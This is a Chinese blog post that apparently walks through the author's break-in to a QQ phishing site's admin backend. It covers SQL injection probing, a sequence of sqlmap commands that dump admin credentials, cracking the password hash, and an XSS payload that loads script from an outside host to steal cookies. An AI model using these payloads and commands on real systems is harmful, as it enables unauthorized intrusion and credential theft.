利用SQL注入|XSS拿下钓鱼网站后台

congtou 2016-12-27 渗透技巧 1 0

故事从周末开始说起,一同学发了一条QQ消息,消息内容如下:

hqayf3b35pn_ezlmy2

第一反应是QQ钓鱼链接,然后点击链接看了一下,看到QQ空间的登录页面就确认是钓鱼链接无疑了:

_20kmvu43%d830gz5l

cmesv8ynyffuxiwuvbypn

当时在忙别的事情,就把链接发送到电脑上,打算晚点看一下。

今天中午的时候想起这回事,打开链接网站还存活着,就开始尝试看有没有可利用的地方,看请求头信息得知服务器中间件是IIS6.0,开发语言是PHP:3k8m6wkdokrehosl

 

手动猜到后台管理地址为/admin/admin.php,登录界面有验证码,不能暴力破解。然后开始从首页的QQ登录框入手,看一下是否有xss漏洞,账号输入正常的数字,密码输入直接输入xss代码<script src=http://xxxxx></script>,当时没有注意到密码框有字段长度16的限制,然后xss后台迟迟没有反应,密码框继续尝试其它的输入值,输入 ' and 1=1 时,看到SQL报错信息,如下:

Query Error:select * from qq where username='330000000' and password='' and 1=1' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

猜测网站应该存在SQL POST注入漏洞,使用sqlmap工具进行mysql注入操作:

先使用Burp获取请求包,便于sqlmap进行POST注入:

kntr8w4czmyjw

把Request请求包保存到kali系统下,开始进行一系列猜解数据库操作:

1.获取数据库信息:

ozu95s3fnscthjlya_c60kx7e70bd0dleh9b2

 

2.使用如下命令获取数据库名为mysql的表信息:

sqlmap -r luigj.txt -D mysql --tables

wpg3w04704uv02i39c2 

3.获取表名为admin的字段列表:

sqlmap -r luigj.txt -D mysql -T admin --columns

yy7qpa85eess2ytr6
 

 

4.获取username和password字段值:

sqlmap -r luigj.txt -D mysql -T admin -C "username,password" --dump

54c4fqjjbnl1dh0ouw

密码经过md5加密,在cmd5网站付费解密获得登录密码,登录后台,第一时间把所有QQ账号密码信息清空:f6f1247w2e6eask4ufe3

SQL注入还可以进行的操作是写入shell进行提权,root密码没有破解出来,网站路径也没有找到,所以暂时搁置。

利用SQL注入获得的账号进入后台后,查找xss没有成功的原因,这时才发现登录密码框有字段长度限制,然后使用Burp进行参数提交,绕过前端js字段限制,成功获取cookies:

dpmg8cjjuujhxh9y

已经拿到后台管理账号了,所以就没有再尝试用cookies登录了,至此告一段落。

转载请注明来自华盟网,本文标题:《利用SQL注入|XSS拿下钓鱼网站后台》

喜欢 (0) 发布评论
1 条回复
加载中...
  1. Suen 3周前 (12-27)
    沙发

    对这些大神表示自己的敬意。 :eek: :eek: :eek: :eek: :eek: :eek:

发表评论